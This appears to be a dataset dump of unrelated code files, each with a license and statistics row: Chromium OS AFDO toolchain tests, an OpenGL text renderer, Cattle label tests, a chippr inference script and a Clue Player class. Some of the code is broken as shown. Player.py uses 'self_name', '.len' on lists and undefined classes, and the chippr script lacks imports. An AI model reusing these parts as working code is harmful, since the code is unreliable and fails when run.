self.assertEqual(self.afdo_versions[k], new_afdo_versions[k])
# Check the git calls correct
message = 'afdo_metadata: Publish new profiles.\n\n'
message += 'Update %s from %s to %s\n' % (self.package,
self.afdo_sorted_by_freshness[1],
self.afdo_sorted_by_freshness[2])
calls = [
mock.call(
self.tempdir, [
'pull',
toolchain_util.TOOLCHAIN_UTILS_REPO,
'refs/heads/master',
],
print_cmd=True),
mock.call(
self.tempdir, ['status', '--porcelain', '-uno'],
capture_output=True,
print_cmd=True),
mock.call(self.tempdir, ['diff'], capture_output=True, print_cmd=True),
mock.call(
self.tempdir, ['commit', '-a', '-m', message], print_cmd=True),
mock.call(
self.tempdir, [
'push', toolchain_util.TOOLCHAIN_UTILS_REPO,
'HEAD:refs/for/master%submit'
],
capture_output=True,
print_cmd=True)
]
self.mock_git.assert_has_calls(calls)
class UploadReleaseChromeAFDOTest(cros_test_lib.MockTempDirTestCase):
"""Test _UploadReleaseChromeAFDO() and related functions."""
# pylint: disable=protected-access
def setUp(self):
self.cwp_name = 'R77-3809.38-1562580965.afdo'
self.cwp_full = self.cwp_name + toolchain_util.XZ_COMPRESSION_SUFFIX
self.arch = 'silvermont'
self.benchmark_name = 'chromeos-chrome-amd64-77.0.3849.0_rc-r1.afdo'
self.benchmark_full = \
self.benchmark_name + toolchain_util.BZ2_COMPRESSION_SUFFIX
cwp_string = '%s-77-3809.38-1562580965' % self.arch
benchmark_string = 'benchmark-77.0.3849.0-r1'
self.merged_name = 'chromeos-chrome-amd64-%s-%s' % (cwp_string,
benchmark_string)
self.redacted_name = self.merged_name + '-redacted.afdo'
self.output = os.path.join(
self.tempdir, self.redacted_name + toolchain_util.XZ_COMPRESSION_SUFFIX)
self.decompress = self.PatchObject(cros_build_lib, 'UncompressFile')
self.compress = self.PatchObject(
toolchain_util, '_CompressAFDOFiles', return_value=[self.output])
self.upload = self.PatchObject(toolchain_util,
'_UploadAFDOArtifactToGSBucket')
self.run_command = self.PatchObject(cros_build_lib, 'run')
self.gs_copy = self.PatchObject(gs.GSContext, 'Copy')
self.PatchObject(osutils.TempDir, '__enter__', return_value=self.tempdir)
@mock.patch.object(builtins, 'open')
def testRedactAFDOProfile(self, mock_open):
"""Test _RedactAFDOProfile() handles calls correctly."""
input_name = os.path.join(self.tempdir, self.merged_name)
input_to_text = input_name + '.text.temp'
redacted_temp = input_name + '.redacted.temp'
removed_temp = input_name + '.removed.temp'
output_name = os.path.join(self.tempdir, self.redacted_name)
mock_file_obj = io.StringIO()
mock_open.return_value = mock_file_obj
toolchain_util._RedactAFDOProfile(input_name, output_name)
redact_calls = [
mock.call(
[
'llvm-profdata',
'merge',
'-sample',
'-text',
input_name,
'-output',
input_to_text,
],
enter_chroot=True,
print_cmd=True,
),
mock.call(
['redact_textual_afdo_profile'],
input=mock_file_obj,
stdout=redacted_temp,
print_cmd=True,
enter_chroot=True,
),
mock.call(
[
'remove_indirect_calls',
'--input=' + redacted_temp,
'--output=' + removed_temp,
],
enter_chroot=True,
print_cmd=True,
),
mock.call(
[
'llvm-profdata',
'merge',
'-sample',
'-compbinary',
removed_temp,
'-output',
output_name,
],
enter_chroot=True,
print_cmd=True,
)
]
self.run_command.assert_has_calls(redact_calls)
def testCreateReleaseChromeAFDOPass(self):
"""Test _CreateReleaseChromeAFDO() handles naming and calls correctly."""
redact_call = self.PatchObject(toolchain_util, '_RedactAFDOProfile')
toolchain_util._CreateReleaseChromeAFDO(self.cwp_name, self.arch,
self.benchmark_name, self.tempdir)
# Check downloading files.
gs_copy_calls = [
mock.call(
os.path.join(toolchain_util.CWP_AFDO_GS_URL, self.arch,
self.cwp_full),
os.path.join(self.tempdir, self.cwp_full)),
mock.call(
os.path.join(toolchain_util.BENCHMARK_AFDO_GS_URL,
self.benchmark_full),
os.path.join(self.tempdir, self.benchmark_full))
]
self.gs_copy.assert_has_calls(gs_copy_calls)
# Check decompress files.
decompress_calls = [
mock.call(
os.path.join(self.tempdir, self.cwp_full),
os.path.join(self.tempdir, self.cwp_name)),
mock.call(
os.path.join(self.tempdir, self.benchmark_full),
os.path.join(self.tempdir, self.benchmark_name))
]
self.decompress.assert_has_calls(decompress_calls)
# Check call to merge.
merge_command = [
'llvm-profdata',
'merge',
'-sample',
'-output=' + os.path.join(self.tempdir, self.merged_name),
'-weighted-input=%d,%s' % (toolchain_util.RELEASE_CWP_MERGE_WEIGHT,
os.path.join(self.tempdir, self.cwp_name)),
'-weighted-input=%d,%s' %
(toolchain_util.RELEASE_BENCHMARK_MERGE_WEIGHT,
os.path.join(self.tempdir, self.benchmark_name)),
]
self.run_command.assert_called_once_with(
merge_command, enter_chroot=True, print_cmd=True)
# Check calls to redact.
redact_call.assert_called_once_with(
os.path.join(self.tempdir, self.merged_name),
os.path.join(self.tempdir, self.redacted_name))
def testUploadReleaseChromeAFDOPass(self):
"""Test _UploadReleaseChromeAFDO() handles naming and calls correctly."""
verified_afdo = os.path.join(self.tempdir, self.redacted_name)
self.PatchObject(
toolchain_util,
'_GetArtifactVersionInEbuild',
return_value=verified_afdo)
ret = toolchain_util._UploadReleaseChromeAFDO()
self.assertEqual(verified_afdo, ret)
# Check compress and upload.
self.compress.assert_called_once_with([os.path.join(verified_afdo)], None,
self.tempdir,
toolchain_util.XZ_COMPRESSION_SUFFIX)
self.upload.assert_called_once_with(
toolchain_util.RELEASE_AFDO_GS_URL_VETTED,
os.path.join(self.tempdir,
self.redacted_name + toolchain_util.XZ_COMPRESSION_SUFFIX))
class UploadAndPublishVettedAFDOArtifactsTest(cros_test_lib.MockTempDirTestCase
):
"""Test UploadAndPublishVettedAFDOArtifacts()."""
orderfile_name = 'chrome.orderfile'
kernel_afdo = 'kernel.afdo'
@staticmethod
def mockUploadVettedAFDOArtifacts(artifact_type, _subcategory=None):
if artifact_type == 'orderfile':
return UploadAndPublishVettedAFDOArtifactsTest.orderfile_name
if artifact_type == 'kernel_afdo':
return UploadAndPublishVettedAFDOArtifactsTest.kernel_afdo
return None
def setUp(self):
self.mock_upload = self.PatchObject(
toolchain_util,
'_UploadVettedAFDOArtifacts',
side_effect=self.mockUploadVettedAFDOArtifacts)
self.mock_publish = self.PatchObject(toolchain_util,
'_PublishVettedAFDOArtifacts')
self.mock_merge = self.PatchObject(toolchain_util,
'_UploadReleaseChromeAFDO')
self.board = 'chell' # Chose chell to test kernel
self.kver = '3.18'
self.kernel_json = os.path.join(toolchain_util.TOOLCHAIN_UTILS_PATH,
'afdo_metadata/kernel_afdo.json')
self.chrome_json = os.path.join(toolchain_util.TOOLCHAIN_UTILS_PATH,
'afdo_metadata/chrome_afdo.json')
def testReturnFalseWhenNoArtifactUploaded(self):
"""Test it returns False when no new artifacts are uploaded."""
mock_upload_nothing = self.PatchObject(
toolchain_util, '_UploadVettedAFDOArtifacts', return_value=None)
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'orderfile', self.board)
self.assertFalse(ret)
mock_upload_nothing.assert_called_once_with('orderfile')
self.mock_publish.assert_not_called()
def testChromeAFDOPass(self):
"""Make sure for chrome_afdo, it calls other functions correctly."""
mock_upload = self.PatchObject(toolchain_util, '_UploadReleaseChromeAFDO')
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'chrome_afdo', self.board)
self.assertTrue(ret)
mock_upload.assert_called_once_with()
self.mock_publish.assert_not_called()
def testKernelAFDOPass(self):
"""Make sure for kernel_afdo, it calls other functions correctly."""
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'kernel_afdo', self.board)
self.assertTrue(ret)
uploaded = {
'chromeos-kernel-' + self.kver.replace('.', '_'): self.kernel_afdo
}
self.mock_upload.assert_called_once_with('kernel_afdo', self.kver)
self.mock_publish.assert_called_once_with(
self.kernel_json, uploaded,
'afdo_metadata: Publish new profiles for kernel %s.' % self.kver)
def testOrderfilePass(self):
"""Make sure for orderfile, it calls other functions correctly."""
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'orderfile', self.board)
self.assertTrue(ret)
self.mock_upload.assert_called_once_with('orderfile')
self.mock_publish.assert_not_called()
|
bsd-3-clause
| 5,497,388,569,140,276,000 | 39.911888 | 80 | 0.656115 | false |
explosiveduck/ed2d
|
ed2d/text.py
|
1
|
8327
|
import ctypes as ct
import freetype.raw as ft
from ed2d import texture
from ed2d import mesh
from ed2d import typeutils
from ed2d.opengl import gl, pgl
# from ed2d import glmath as cyglmath
# from ed2d.glmath import cython as cyglmath
from gem import matrix, vector
# Hack to verify that freetype is properly destructed after everything
# this code was also commited to freetype-py
class _FT_Library_Wrapper(ft.FT_Library):
'''Subclass of FT_Library to help with calling FT_Done_FreeType'''
# for some reason this doesn't get carried over and ctypes complains
_type_ = ft.FT_Library._type_
# Store ref to FT_Done_FreeType otherwise it will be deleted before needed.
_ft_done_freetype = ft.FT_Done_FreeType
def __del__(self):
# call FT_Done_FreeType
self._ft_done_freetype(self)
def init_freetype():
handle = _FT_Library_Wrapper()
if ft.FT_Init_FreeType(ct.byref(handle)):
raise Exception('FreeType failed to initialize.')
return handle
freetype = init_freetype()
# These are the usable fields of FT_GlyphSlotRec
# field: data type:
# library FT_Library
# face FT_Face
# next FT_GlyphSlot
# generic FT_Generic
# metrics FT_Glyph_Metrics
# linearHoriAdvance FT_Fixed
# linearVertAdvance FT_Fixed
# advance FT_Vector
# format FT_Glyph_Format
# bitmap FT_Bitmap
# bitmap_left FT_Int
# bitmap_top FT_Int
# outline FT_Outline
# num_subglyphs FT_UInt
# subglyphs FT_SubGlyph
# control_data void*
# control_len long
# lsb_delta FT_Pos
# rsb_delta FT_Pos
class Font(object):
def __init__(self, size, fontPath):
self.size = size
self.path = fontPath
self.face = ft.FT_Face()
# here is the general structure of the char data dict.
#
# It has
self.charDataCache = {}
# load font face
if ft.FT_New_Face(freetype, typeutils.to_c_str(fontPath), 0,
ct.byref(self.face)):
raise Exception('Error loading font.')
# For now the device dpi will be hard coded to 72
# later on if we want to do mobile stuff, or have dpi scaling
# for high-dpi monitors this will need to be changed.
if ft.FT_Set_Char_Size(self.face, 0, size * 64, 72, 72):
raise Exception('Error setting character size.')
def load_glyph(self, char):
'''
Loads glyph, and returns a dictionary containing glyph data.
'''
try:
return self.charDataCache[char]
except KeyError:
index = ft.FT_Get_Char_Index(self.face, ord(char))
if ft.FT_Load_Glyph(self.face, index, ft.FT_LOAD_RENDER):
raise Exception('Error loading glyph')
glyphSlot = self.face.contents.glyph
charData = {}
bitmapStruct = glyphSlot.contents.bitmap
texWidth = bitmapStruct.width
texHeight = bitmapStruct.rows
pixelData = [0.0 for x in range(texWidth * texHeight)]
for item in range(texWidth * texHeight):
pixelData[item] = bitmapStruct.buffer[item]
if not pixelData:
pixelData = [0]
charData['pixelData'] = pixelData
charData['bitmap_x'] = glyphSlot.contents.bitmap_left
charData['bitmap_y'] = glyphSlot.contents.bitmap_top
charData['texWidth'] = texWidth
charData['texHeight'] = texHeight
charData['advance'] = glyphSlot.contents.advance.x >> 6
self.charDataCache[char] = charData
return charData
def delete(self):
'''Delete the freetype face'''
ft.FT_Done_Face(self.face)
class Text(object):
def __init__(self, program, font):
self.program = program
self.texAtlas = texture.TextureAtlas(self.program, texFormat=gl.GL_RED)
self.font = font
self.vertLoc = self.program.get_attribute(b'position')
self.UVLoc = self.program.get_attribute(b'vertexUV')
self.data = [[0.0, 1.0], [1.0, 1.0], [0.0, 0.0], [1.0, 0.0] ]
self.chrMap = {}
self.basePos = 0.0
self.lineSpacing = 3
for texVal in range(32, 128):
char = chr(texVal)
fontData = self.font.load_glyph(char)
# Find the fartherst position from the baseline
if fontData['bitmap_y'] > self.basePos:
self.basePos = fontData['bitmap_y']
self.chrMap[char] = Glyph(self.program, self.texAtlas, fontData,
char, self)
print(self.basePos)
self.texAtlas.gen_atlas()
self.vbo = mesh.buffer_object(self.data, gl.GLfloat)
for glyph in self.chrMap.values():
glyph.init_gl()
def draw_text(self, text, xPos, yPos):
self.program.use()
self.texAtlas.bind()
# When you can dynamically add textures to an Atlas
# this is where the glyph objects will be created.
# Instead of taking a while on init to generate all
# normal characters.
textLines = text.split('\n')
penPosX = xPos
penPosY = self.basePos + yPos
for txt in textLines:
for c in txt:
char = self.chrMap[c]
char.render(penPosX, penPosY)
penPosX += char.advance
penPosY += self.basePos + self.lineSpacing
penPosX = xPos
# gl.glDisableVertexAttribArray(self.UVLoc)
# gl.glDisableVertexAttribArray(self.vertLoc)
# gl.glBindBuffer(gl.GL_ARRAY_BUFFER, 0)
gl.glBindVertexArray(0)
class Glyph(object):
def __init__(self, program, atlas, fontData, char, parent):
self.atlas = atlas
self.fontData = fontData
self.program = program
self.parent = parent
self.nverts = 4
self.vertLoc = self.program.get_attribute(b'position')
self.modelLoc = self.program.new_uniform(b'model')
self.UVLoc = self.program.get_attribute(b'vertexUV')
self.modelMatrix = matrix.Matrix(4)
self.char = char
self.pixelData = self.fontData['pixelData']
self.textureWidth = self.fontData['texWidth']
self.textureHeight = self.fontData['texHeight']
self.bitX = self.fontData['bitmap_x']
self.bitY = self.fontData['bitmap_y']
self.advance = self.fontData['advance']
self.uniform = self.program.get_uniform(self.modelLoc)
self.textureID = self.atlas.add_texture(self.textureWidth,
self.textureHeight,
self.pixelData)
def init_gl(self):
self.vao = pgl.glGenVertexArrays(1)
gl.glBindVertexArray(self.vao)
self._uvCoords = self.atlas.get_uvcoords(self.textureID)
self.vertexScale = self.atlas.get_vertex_scale(self.textureID)
vecScale = vector.Vector(
3,
data=[self.atlas.maxSubTextureHeight * self.vertexScale[0],
self.atlas.maxSubTextureHeight * self.vertexScale[1], 0.0])
self.scaleMat = matrix.Matrix(4).i_scale(vecScale)
self.uvbo = mesh.buffer_object(self._uvCoords, gl.GLfloat)
gl.glEnableVertexAttribArray(self.vertLoc)
gl.glEnableVertexAttribArray(self.UVLoc)
gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.parent.vbo)
pgl.glVertexAttribPointer(self.vertLoc, 2, gl.GL_FLOAT, gl.GL_FALSE, 0, None)
gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.uvbo)
pgl.glVertexAttribPointer(self.UVLoc, 2, gl.GL_FLOAT, gl.GL_FALSE, 0, None)
gl.glBindVertexArray(0)
def render(self, posX, posY):
gl.glBindVertexArray(self.vao)
vecScale = vector.Vector(
3,
data=[posX + self.bitX, posY - self.bitY, 0.0])
self.modelMatrix = self.scaleMat.translate(vecScale)
self.program.set_uniform_matrix(self.modelLoc, self.modelMatrix,
uniform=self.uniform,
size=4)
gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, self.nverts)
|
bsd-2-clause
| -91,192,763,042,211,230 | 29.95539 | 85 | 0.594332 | false |
yasker/cattle
|
tests/integration/cattletest/core/test_label.py
|
1
|
3780
|
from common_fixtures import * # NOQA
def _clean_hostlabelmaps_for_host(client, host):
for label in host.labels():
host.removelabel(label=label.id)
wait_for_condition(
client, host,
lambda x: len(x.labels()) == 0,
lambda x: 'Number of labels for host is: ' + len(x.labels()))
def test_add_remove_host_label(super_client, sim_context):
host = sim_context['host']
_clean_hostlabelmaps_for_host(super_client, host)
host.addlabel(key='location', value='basement')
assert host.labels()[0].key == 'location'\
and host.labels()[0].value == 'basement'
# make sure duplicate entry is not made
host.addlabel(key='location', value='basement')
assert len(host.labels()) == 1
host.addlabel(key='color', value='blue')
assert len(host.labels()) == 2
_clean_hostlabelmaps_for_host(super_client, host)
assert len(host.labels()) == 0
def test_add_remove_container_label(admin_client, sim_context):
host = sim_context['host']
image_uuid = sim_context['imageUuid']
c = admin_client.create_container(imageUuid=image_uuid,
requestedHostId=host.id)
c.addlabel(key='func', value='web')
assert c.instanceLabels()[0].key == 'func' \
and c.instanceLabels()[0].value == 'web'
# make sure duplicate entry is not made
c.addlabel(key='func', value='web')
assert len(c.instanceLabels()) == 1
c.addlabel(key='nom', value='son')
assert len(c.instanceLabels()) == 2
c.removelabel(label=c.instanceLabels()[1].id)
c.removelabel(label=c.instanceLabels()[0].id)
wait_for_condition(
admin_client, c,
lambda x: len(x.instanceLabels()) == 0,
lambda x: 'Number of labels for container is: ' + len(x.labels()))
def test_set_container_labels(admin_client, sim_context):
host = sim_context['host']
image_uuid = sim_context['imageUuid']
c = admin_client.create_container(imageUuid=image_uuid,
requestedHostId=host.id)
labels = {'role': 'web',
'size': '4'}
c.setlabels(labels=labels)
wait_for_condition(
admin_client, c,
lambda x: len(x.instanceLabels()) == 2,
lambda x: 'Number of labels for container is: ' +
len(x.instanceLabels()))
_assert_labels(c.instanceLabels(), labels)
new_labels = {'role': 'web+db',
'nom': 'foobar'}
c.setlabels(labels=new_labels)
wait_for_condition(
admin_client, c,
lambda x: len(x.instanceLabels()) == 2,
lambda x: 'Number of labels for container is: ' +
len(x.instanceLabels()))
_assert_labels(c.instanceLabels(), new_labels)
def test_set_host_labels(super_client, sim_context):
host = sim_context['host']
_clean_hostlabelmaps_for_host(super_client, host)
labels = {'location': 'closet',
'cpus': '4'}
host.setlabels(labels=labels)
wait_for_condition(
super_client, host,
lambda x: len(x.labels()) == 2,
lambda x: 'Number of labels for host is: ' + len(x.labels()))
_assert_labels(host.labels(), labels)
new_labels = {'location': 'attic',
'memory': '16gb'}
host.setlabels(labels=new_labels)
wait_for_condition(
super_client, host,
lambda x: len(x.labels()) == 2,
lambda x: 'Number of labels for host is: ' + len(x.labels()))
_assert_labels(host.labels(), new_labels)
def _assert_labels(labels_list, checking_for_labels):
labels_map = {}
for label in labels_list:
labels_map[label.key] = label.value
for k, v in checking_for_labels.items():
assert labels_map.get(k) is not None and labels_map.get(k) == v
|
apache-2.0
| -5,746,245,027,994,667,000 | 30.239669 | 74 | 0.60291 | false |
aimalz/chippr
|
research/scripts/multi_inf_script.py
|
1
|
5585
|
def check_prob_params(params):
"""
Sets parameter values pertaining to components of probability
Parameters
----------
params: dict
dictionary containing key/value pairs for probability
Returns
-------
params: dict
dictionary containing key/value pairs for probability
"""
if 'prior_mean' not in params:
params['prior_mean'] = 'interim'
else:
params['prior_mean'] = params['prior_mean'][0]
if 'no_prior' not in params:
params['no_prior'] = 0
else:
params['no_prior'] = int(params['no_prior'][0])
if 'no_data' not in params:
params['no_data'] = 0
else:
params['no_data'] = int(params['no_data'][0])
return params
def set_up_prior(data, params):
"""
Function to create prior distribution from data
Parameters
----------
data: dict
catalog dictionary containing bin endpoints, log interim prior, and log
interim posteriors
params: dict
dictionary of parameter values for creation of prior
Returns
-------
prior: chippr.mvn object
prior distribution as multivariate normal
"""
zs = data['bin_ends']
log_nz_intp = data['log_interim_prior']
log_z_posts = data['log_interim_posteriors']
z_difs = zs[1:]-zs[:-1]
z_mids = (zs[1:]+zs[:-1])/2.
n_bins = len(z_mids)
n_pdfs = len(log_z_posts)
a = 1.# / n_bins
b = 3.#1. / z_difs ** 2
c = 3.e-2#a / n_pdfs
prior_var = np.eye(n_bins)
for k in range(n_bins):
prior_var[k] = a * np.exp(-0.5 * b * (z_mids[k] - z_mids) ** 2)
prior_var += c * np.identity(n_bins)
prior_mean = log_nz_intp
prior = mvn(prior_mean, prior_var)
if params['prior_mean'] == 'sample':
new_mean = prior.sample_one()
prior = mvn(new_mean, prior_var)
print(params['prior_mean'], prior_mean, new_mean)
else:
print(params['prior_mean'], prior_mean)
return (prior, prior_var)
def do_inference(given_key):
"""
Function to do inference from a catalog of photo-z interim posteriors
Parameters
----------
given_key: string
name of test case to be run
Notes
-----
TODO: enable continuation of sampling starting from samples in a file
"""
test_info = all_tests[given_key]
test_name = test_info['name']
test_name = test_name[:-1]
param_file_name = test_name + '.txt'
params = chippr.utils.ingest(param_file_name)
params = check_prob_params(params)
params = defaults.check_inf_params(params)
print(params)
test_dir = os.path.join(result_dir, test_name)
simulated_posteriors = catalog(params=param_file_name, loc=test_dir, prepend=test_name)
saved_location = 'data'
saved_type = '.txt'
data = simulated_posteriors.read(loc=saved_location, style=saved_type)
zs = data['bin_ends']
z_difs = zs[1:]-zs[:-1]
with open(os.path.join(os.path.join(test_dir, saved_location), 'true_vals.txt'), 'r') as true_file:
true_data = csv.reader(true_file, delimiter=' ')
true_vals = []
for z in true_data:
true_vals.append(float(z[0]))
true_vals = np.array(true_vals)
true_vals = np.histogram(true_vals, bins=zs, density=True)[0]
true_nz = chippr.discrete(zs, true_vals)
(prior, cov) = set_up_prior(data, params)
nz = log_z_dens(data, prior, truth=true_nz, loc=test_dir, prepend=test_name, vb=True)
nz_stacked = nz.calculate_stacked()
# print('stacked: '+str(np.dot(np.exp(nz_stacked), z_difs)))
nz_mmap = nz.calculate_mmap()
# print('MMAP: '+str(np.dot(np.exp(nz_mmap), z_difs)))
# nz_mexp = nz.calculate_mexp()
# print('MExp: '+str(np.dot(np.exp(nz_mexp), z_difs)))
start_mmle = timeit.default_timer()
nz_mmle = nz.calculate_mmle(nz_stacked, no_data=params['no_data'], no_prior=params['no_prior'])
end_mmle = timeit.default_timer()-start_mmle
print('MMLE: '+str(np.dot(np.exp(nz_mmle), z_difs))+' in '+str(end_mmle))
nz_stats = nz.compare()
nz.plot_estimators(log=True, mini=False)
nz.plot_estimators(log=False, mini=False)
nz.write('nz.p')
# COMMENT OUT TO AVOID SAMPLING
#start_mean = mvn(nz_mmle, cov).sample_one()
start = prior#mvn(data['log_interim_prior'], cov)
n_bins = len(zs) - 1
if params['n_walkers'] is not None:
n_ivals = params['n_walkers']
else:
n_ivals = 10 * n_bins
initial_values = start.sample(n_ivals)
start_samps = timeit.default_timer()
nz_samps = nz.calculate_samples(initial_values, no_data=params['no_data'], no_prior=params['no_prior'], n_procs=1, gr_threshold=params['gr_threshold'])
time_samps = timeit.default_timer()-start_samps
print(test_name+' sampled '+str(params['n_accepted'])+' after '+str(nz.burn_ins * params['n_burned'])+' in '+str(time_samps))
nz_stats = nz.compare()
nz.plot_estimators(log=True, mini=False)
nz.plot_estimators(log=False, mini=False)
nz.write('nz.p')
if __name__ == "__main__":
import numpy as np
import pickle
import os
import multiprocessing as mp
import chippr
from chippr import *
result_dir = os.path.join('..', 'results')
name_file = 'which_inf_tests.txt'
with open(name_file) as tests_to_run:
all_tests = {}
for test_name in tests_to_run:
test_info = {}
test_info['name'] = test_name
all_tests[test_name] = test_info
nps = mp.cpu_count()
pool = mp.Pool(nps)
pool.map(do_inference, all_tests.keys())
|
mit
| -2,699,593,026,303,623,700 | 30.201117 | 155 | 0.604118 | false |
BrandonYates/sherlock
|
Python/Clue/Player.py
|
1
|
1585
|
#!/usr/bin/python
class Player:
#just a string identifier
_name = None
#array of card objects given at game init
_cards = None
#player objects created at game init
_opponents = None
#map of cards associated with each opponent
#opponens is like a set of keys
#_knowledge.get(_opponents[0]) returns the knowledge
# for the zeroth opponent
_knowledge = {}
def __init__(self, name):
self._name = name
def getName(self):
return self_name
def getCards(self):
return self._cards
def getOpponents(self):
return self._opponents
def setCards(self, cards):
self._cards = cards
def setOpponents(self, opponents):
self._opponents = opponents
class PlayerKnowledge:
_playerName = None
_cardKnowledge = {}
def __init__(self, name):
self._playerName = name
characterNames = CharacterName.getNames()
weaponNames = WeaponName.getNames()
roomNames = RoomName.getNames()
for x in range(0, characterNames.len):
name = characterNames[x]
self._cardKnowledge[name] = False
for x in range(0, weaponNames.len):
name = weaponNames[x]
self._cardKnowledge[name] = False
for x in range(0, roomNames.len):
name = roomNames[x]
self._cardKnowledge[name] = False
def updateKnowledge(self, key, value):
self._cardKnowledge.update({key: value})
def getPlayerName(self):
return self_playerName
|
gpl-3.0
| 7,106,148,268,937,828,000 | 23.015152 | 56 | 0.599369 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.